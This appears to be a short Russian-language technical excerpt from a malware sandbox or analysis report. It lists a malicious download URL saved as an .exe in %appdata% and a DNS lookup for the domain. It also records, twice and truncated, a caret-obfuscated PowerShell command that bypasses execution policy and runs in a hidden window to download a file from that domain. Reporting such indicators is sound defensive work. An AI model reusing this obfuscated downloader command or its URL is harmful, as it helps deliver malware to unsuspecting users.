Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^ersh^El^L.Ex^e -Exe^C^uT^io^NPOl^ic^Y bYPAS^s -n^OP^rO^FiLE^ -w^iNdOw^styLe^ hiD^dE^n ^(NEw-^o^BjEcT^ s^y^S^teM^.Ne^t^.we^BcLIEnT)^.dowN^L^O^A^dfile(^'http://root...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "P^Ow^ersh^El^L.Ex^e -Exe^C^uT^io^NPOl^ic^Y bYPAS^s -n^OP^rO^FiLE^ -w^iNdOw^styLe^ hiD^dE^n ^(NEw-^o^BjEcT^ s^y^S^teM^.Ne^t^.we^BcLIEnT)^.dowN^L^O^A^dfile(^'http://root...' (со скрытым окном)